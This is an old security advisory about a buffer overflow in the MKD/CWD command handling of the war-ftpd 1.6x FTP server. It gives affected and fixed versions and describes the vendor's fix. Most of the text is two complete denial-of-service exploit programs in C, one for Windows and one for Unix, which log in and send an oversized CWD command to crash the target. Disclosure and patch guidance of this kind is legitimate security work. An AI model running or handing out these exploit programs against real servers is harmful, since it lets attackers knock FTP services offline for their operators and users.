COMMAND
war-ftpd
SYSTEMS AFFECTED
war-ftpd 1.6x
PROBLEM
Toshimi Makino found following. "war-ftpd" is very popular ftp
server for Windows95/98/NT. The problem seems to occur because
the bound check of the command of MKD/CWD that uses it is
imperfect when this problem controls the directory.
However, could not hijack the control of EIP so as long as Toshimi
test. It is because not able to overwrite the RET address,
because it seems to be checking buffer total capacity properly in
1.66x4 and later.
The boundary of Access Violation breaks out among 8182 bytes from
533 bytes neighborhood although it differs by the thread that
receives attack.
The version that is confirming this vulnerable point is 1.66x4s,
1.67-3. Testing wnvironments:
Microsoft WindowsNT 4.0 Workstation SP6a Japanese version+IE4.0SP2
Microsoft WindowsNT 4.0 Workstation SP5 Japanese version+IE4.0SP2
Microsoft WindowsNT 4.0 Server SP4 Japanese version
Exploit:
/*--------------------------------------------------------------*/
/* war-ftpd 1.66x4s and 1.67-3 DoS sample by crc "warftpd-dos.c"*/
/*--------------------------------------------------------------*/
#include <stdio.h>
#include <string.h>
#include <winsock.h>
#include <windows.h>
#define FTP_PORT 21
#define MAXBUF 8182
//#define MAXBUF 553
#define MAXPACKETBUF 32000
#define NOP 0x90
void main(int argc,char *argv[])
{
SOCKET sock;
unsigned long victimaddr;
SOCKADDR_IN victimsockaddr;
WORD wVersionRequested;
int nErrorStatus;
static unsigned char buf[MAXBUF],packetbuf[MAXPACKETBUF],*q;
hostent *victimhostent;
WSADATA wsa;
if (argc < 3){
printf("Usage: %s TargetHost UserName Password\n",argv[0]); exit(1);
}
wVersionRequested = MAKEWORD(1, 1);
nErrorStatus = WSAStartup(wVersionRequested, &wsa);
if (atexit((void (*)(void))(WSACleanup))) {
fprintf(stderr,"atexit(WSACleanup)failed\n"); exit(-1);
}
if ( nErrorStatus != 0 ) {
fprintf(stderr,"Winsock Initialization failed\n"); exit(-1);
}
if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){
fprintf(stderr,"Can't create socket.\n"); exit(-1);
}
victimaddr = inet_addr((char*)argv[1]);
if (victimaddr == -1) {
victimhostent = gethostbyname(argv[1]);
if (victimhostent == NULL) {
fprintf(stderr,"Can't resolve specified host.\n"); exit(-1);
}
else
victimaddr = *((unsigned long *)((victimhostent->h_addr_list)[0]));
}
victimsockaddr.sin_family = AF_INET;
victimsockaddr.sin_addr.s_addr = victimaddr;
victimsockaddr.sin_port = htons((unsigned short)FTP_PORT);
memset(victimsockaddr.sin_zero,(int)0,sizeof(victimsockaddr.sin_zero));
if(connect(sock,(struct sockaddr *)&victimsockaddr,sizeof(victimsockaddr)) == SOCKET_ERROR){
fprintf(stderr,"Connection refused.\n"); exit(-1);
}
printf("Attacking war-ftpd ...\n");
recv(sock,(char *)packetbuf,MAXPACKETBUF,0);
sprintf((char *)packetbuf,"USER %s\r\n",argv[2]);
send(sock,(char *)packetbuf,strlen((char *)packetbuf),0);
recv(sock,(char *)packetbuf,MAXPACKETBUF,0);
sprintf((char *)packetbuf,"PASS %s\r\n",argv[3]);
send(sock,(char *)packetbuf,strlen((char *)packetbuf),0);
recv(sock,(char *)packetbuf,MAXPACKETBUF,0);
memset(buf,NOP,MAXBUF); buf[MAXBUF-1]=0;
sprintf((char *)packetbuf,"CWD %s\r\n",buf);
send(sock,(char *)packetbuf,strlen((char *)packetbuf),0);
Sleep(100);
shutdown(sock, 2);
closesocket(sock);
WSACleanup();
printf("done.\n");
}
Mixter added following:
/* coded by eth0 from buffer0verfl0w */
/* tested by morpha */
/* *NOTE* Original exploit was coded for winbl0wz *NOTE */
/*
Vulnerable:
War FTPd version 1.66x4
War FTPd version 1.67-3
Immune:
War FTPd version 1.67-4
War FTPd version 1.71-0
The buffer overflow seems to occur because the bound
check of the command of MKD/CWD is imperfect. This
means that although anyone can overflow the statically
assigned buffer that stores the requested path, you
cannot overwrite the RET address and therefore it's
impossible to cause War FTPd to execute arbitrary code.
However, it is a simple mechanism for performing a Denial
of-Service against the server.
Solution:
War FTPd 1.70-1 does fix this problem, but it contains other
vulnerabilities (see our additional information section).
*/
#include <stdio.h>
#include <strings.h>
#include <errno.h>
#include <signal.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#define FTP_PORT 21
#define MAXBUF 8182
//#define MAXBUF 553
#define MAXPACKETBUF 32000
#define NOP 0x90
#define PASS "PASS eth0@owns.your.ass.com\r\n"
#define LOGIN "USER anonymous\r\n"
int expl0it(char *host)
{
struct hostent *hp;
struct in_addr addr;
struct sockaddr_in s;
static unsigned char buf[MAXBUF],packetbuf[MAXPACKETBUF],*q;
/* u_char buf[280]; */
int p, i;
hp = gethostbyname (host);
if (!hp) exit (1);
bcopy (hp->h_addr, &addr, sizeof (struct in_addr));
p = socket (s.sin_family = 2, 1, IPPROTO_TCP);
s.sin_port = htons (FTP_PORT);
s.sin_addr.s_addr = inet_addr (inet_ntoa (addr));
if(connect (p, &s, sizeof (s))!=0)
{
printf("[%s:%s] <-- doesn't seem to be listening\n",host,FTP_PORT);
return;
}
else {
printf("Connected!\n");
write(p, LOGIN, strlen(LOGIN));
write(p, PASS, strlen(PASS));
memset(buf,NOP,MAXBUF); buf[MAXBUF-1]=0;
sprintf((char *)packetbuf,"CWD %s\r\n",buf);
send(p,(char *)packetbuf,strlen((char *)packetbuf),0);
printf("DONE!\n");
}
return(0);
}
int main(int argc, char *argv[])
{
if(argc<2)
{
printf("Usage: %s [host] \n",argv[0]);
return;
}
else
{
expl0it(argv[1]);
}
return(0);
}
/* www.hack.co.za [10 May]*/
SOLUTION
1.70-1 should be used to solve this problem fundamentally.
Because it becomes "Access denied" in 1.71-0 DoS did not break
out.
Until now, the command parser in War FTP Daemon 1.6* has allowed
commands up to 8 KB in size. To prevent this, and other
buffer-overflow problems, this size is decreased to (MAX_PATH + 8)
and an additional check is added that prevents any command
argument to exceed MAX_PATH in length. A new version, 1.67-4 has
been released with this modification. See
http://war.jgaa.com/alert/
for download details.